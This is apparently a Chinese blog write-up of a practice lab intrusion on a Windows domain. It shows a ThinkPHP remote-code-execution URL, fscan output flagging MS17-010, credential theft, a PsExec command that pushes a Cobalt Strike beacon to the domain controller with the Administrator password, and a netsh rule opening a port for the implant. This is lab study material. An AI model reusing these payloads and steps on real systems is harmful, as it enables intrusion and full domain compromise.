随便练练!
基本配置
- Win7
- 192.168.31.0/24, 192.168.138.0/24
- sun\leo 123.com
- sun\Administrator dc123.com
- 打开 C 盘下的 phpStudy
- DC
- 192.168.138.0/24
- sun\admin 2020.com
nmap扫一手
web开的是个thinkphp,直接打
http://192.168.31.44/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
进行一个cs上线
进行一波信息收集
fscan扫了一波
+] received output:
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.138.136 is alive
(icmp) Target 192.168.138.138 is alive
[*] Icmp alive hosts len is: 2
192.168.138.136:139 open
192.168.138.138:135 open
192.168.138.138:88 open
192.168.138.136:3306 open
192.168.138.138:445 open
192.168.138.136:445 open
192.168.138.138:139 open
192.168.138.136:135 open
192.168.138.136:80 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo:
[*]192.168.138.136
[->]win7
[->]192.168.138.136
[->]192.168.31.44
[+] 192.168.138.136 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.138.136 code:200 len:931 title:None
[*] NetBios: 192.168.138.136 win7.sun.com Windows 7 Professional 7601 Service Pack 1
[*] NetBios: 192.168.138.138 [+]DC DC.sun.com Windows Server 2008 HPC Edition 7600
[*] NetInfo:
[*]192.168.138.138
[->]DC
[->]192.168.138.138
[+] 192.168.138.138 MS17-010 (Windows Server 2008 HPC Edition 7600)
[+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5-controller-rce
[+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5023-method-rce poc1
有一个dc域,能打17010
先用svc把当前主机提权了。
抓到域控密码:
接下来打域控,域控在内网,把当前win7先做个中转
然后既然有密码了psexec上木马就行了
shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p dc123.com -d -c C:\phpStudy\PHPTutorial\WWW\public\beacon.exe
难蚌,忘了靶机那边改密码了
改好后再打
上线失败,猜测是win7端口开了防火墙,放行一下cs端口
shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4445
再次运行,上线成功
最后再提权一手,结束
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容